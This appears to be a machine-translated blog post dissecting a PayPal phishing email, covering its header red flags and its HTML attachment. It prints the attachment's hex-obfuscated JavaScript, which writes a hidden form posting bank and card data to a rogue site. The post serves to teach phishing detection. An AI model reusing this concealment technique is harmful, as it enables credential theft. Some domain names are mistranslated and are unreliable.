In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.
不要認為只有你的銀行資訊才是重要的:畢竟,如果有人控制了你的帳戶登入,他們不僅知道該帳戶中包含的資訊,而且很有可能相同的登入資訊會被用於其他各種帳戶。如果他們洩露了你的電子郵件帳戶,他們可以重置你的所有其他密碼。
因此,除了保持強大和不同的密碼,你必須時刻警惕偽裝成真品的虛假電子郵件。雖然大多數網路釣魚嘗試是業餘的,一些是相當有說服力的,所以重要的是要了解如何識別他們在表面水平,以及他們如何在引擎蓋下工作。
阿西拉普圖片
我們的示例電子郵件與大多數網路釣魚嘗試一樣,“通知”您貝寶帳戶上的活動,在正常情況下,這將是令人震驚的。因此,行動的要求是透過提交你能想到的每一條個人資訊來驗證/恢復你的賬戶。同樣,這是相當公式化的。
當然也有例外,幾乎每一封網路釣魚和詐騙郵件都會直接在郵件中載入紅旗。即使文字是令人信服的,你通常可以發現許多錯誤散落在整個郵件正文,這表明該郵件是不合法的。
訊息正文
乍一看,這是我見過的最好的網路釣魚郵件之一。這裡沒有拼寫或語法錯誤,而且逐字逐句都是按照你的預期來讀的。但是,當您更仔細地檢查內容時,可以看到一些危險訊號。
訊息頭
當您檢視訊息頭時,會出現更多的紅色標誌:
附件
當我開啟附件時,您可以立即看到佈局不正確,因為它缺少樣式資訊。再說一次,當貝寶可以簡單地在他們的網站上給你一個連結的時候,為什麼要用電子郵件傳送一個HTML表單呢?
注意:我們使用了Gmail內建的HTML附件檢視器,但是我們建議你不要開啟騙子的附件。從未。永遠不會。他們經常包含漏洞,將安裝特洛伊木馬在您的電腦上竊取您的帳戶資訊。
再向下滾動一點,你可以看到這個表單不僅要求我們的貝寶登入資訊,但銀行和信用卡資訊以及。有些影象被破壞了。
很明顯,這種網路釣魚的企圖是一蹴而就。
雖然很明顯這是一個網路釣魚的企圖,但我們現在要分析一下電子郵件的技術組成,看看能找到什麼。
附件中的資訊
首先要看附件表單的HTML原始碼,它將資料提交到偽站點。
快速檢視原始碼時,所有連結都顯示為有效,因為它們指向貝寶網“或”paypalobjects.com“都是合法的。
現在我們來看看Firefox在頁面上收集的一些基本頁面資訊。
如您所見,一些圖形是從域中提取的“blessedtobe.com網站”, “好健康藥房網“和”圖片-上傳.de“而不是合法的貝寶域名。
郵件頭中的資訊
接下來我們將看看原始的電子郵件訊息頭。Gmail透過郵件上的Show Original選單選項提供這一功能。
檢視原始郵件的標題資訊,可以看到此郵件是使用outlookexpress6編寫的。我懷疑PayPal的員工中是否有人透過過時的電子郵件客戶端手動傳送這些訊息。
現在檢視路由資訊,我們可以看到傳送者和中繼郵件伺服器的IP地址。
“使用者”IP地址是原始發件人。快速查詢IP資訊,我們可以看到傳送IP在德國。
當我們看到中繼郵件伺服器的(郵件.itak.at),IP地址我們可以看到這是一個基於奧地利的ISP。我懷疑貝寶直接透過奧地利的ISP傳送電子郵件,因為他們有一個龐大的伺服器場,可以很容易地處理這項任務。
資料到哪裡去了?
因此,我們已經明確確定這是一封網路釣魚郵件,並收集了一些有關郵件來源的資訊,但您的資料是從哪裡傳送的呢?
要看到這一點,我們必須先將HTM附件儲存到桌面上,然後在文字編輯器中開啟。滾動瀏覽它,除了看到一個可疑的Javascript塊外,其他一切看起來都井然有序。
開啟最後一塊Javascript的完整原始碼,我們看到:
<script language=”JavaScript” type=”text/javascript”> // Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y); </script>
每當你看到一個巨大的亂七八糟的字串似乎隨機字母和數字嵌入在一個Javascript塊,它通常是可疑的東西。檢視程式碼,變數“x”被設定為這個大字串,然後被解碼為變數“y”。變數“y”的最終結果將作為HTML寫入文件。
由於大字串由數字0-9和字母a-f組成,因此很可能透過簡單的ASCII到十六進位制轉換進行編碼:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
轉換為:
<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>
這並不是一個巧合,這解碼成一個有效的HTML表單標籤,傳送結果不是貝寶,而是一個流氓網站。
此外,當您查看錶單的HTML原始碼時,您將看到此表單標記不可見,因為它是透過Javascript動態生成的。如果有人只是簡單地檢視附件的生成源(正如我們之前所做的那樣),而不是直接在文字編輯器中開啟附件,那麼這是一種隱藏HTML實際操作的聰明方法。
在違規網站上快速執行whois,我們可以看到這是一個託管在流行web主機1和1上的域。
最突出的是域使用可讀的名稱(與類似“dfh3”的名稱相反)sjhskjhw.net網站)並且該域已註冊4年。正因為如此,我相信這個域名被劫持,並作為一個棋子在這個網路釣魚企圖。
說到安全上網,有點玩世不恭是沒有壞處的。
雖然我確信示例電子郵件中有更多的危險訊號,但我們上面指出的是我們在幾分鐘的檢查後看到的指標。假設,如果郵件的表層100%地模仿了它的合法副本,那麼技術分析仍然可以揭示它的真實本質。這就是為什麼能夠同時檢查你能看到和看不到的東西是重要的。
有一個新的Netflix網路釣魚電子郵件做輪,這一個似乎特別好地放在一起。這封郵件暗示你的帳戶將被暫停,除非你行動迅速,但意圖,一如既往地與這類電子郵件,是要得到你的信用卡資訊。 ...
... 不過,令人遺憾的是,我們不斷髮現,網際網路上沒有什麼是安全的。一個很好的例子:2017年春季的網路釣魚企圖欺騙谷歌文件並濫用谷歌OAuth系統。攻擊者是如何入侵谷歌賬戶的?什麼資料丟失了?你怎麼知道?...
只要網際網路還在,惡意的人就會用它來敲詐別人。在欺詐網站、電子郵件詐騙和其他形式的欺騙之間,無數人因網際網路欺詐和詐騙損失了數十億美元。 ...
... 你想知道最可怕的部分嗎?網路罪犯甚至不需要偷你的**就可以獲得你的號碼和個人資訊。最近駭客攻擊的這一趨勢被稱為SIM卡交換。 ...
儘管電子郵件服務在過濾網路釣魚企圖方面越來越出色,但一些服務將不可避免地被過濾掉。在這一點上,你有責任發現網路釣魚郵件並採取相應的行動。但你在發現網路釣魚郵件方面有多在行? ...
在過去的幾年裡,我們看到網路攻擊的發生頻率、複雜性和針對更大目標的攻擊。我們所面臨的來自駭客、病毒、惡意軟體和資料洩露的威脅並沒有消失——它們正在演變,隨著我們臨近2019年,還會有更多的威脅出現。就連硬...
... 正如你可能熟悉的,網路釣魚郵件假裝來自合法的權威機構,如銀行、線上零售商或類似機構。但是,如果你點選電子郵件中的連結,你最終會進入一個虛假頁面,把敏感資訊交給竊賊。 ...
... 一份《網路安全內幕人士2020年內幕威脅報告》的結論是,63%的組織認為特權IT使用者是對安全的最大潛在威脅。 ...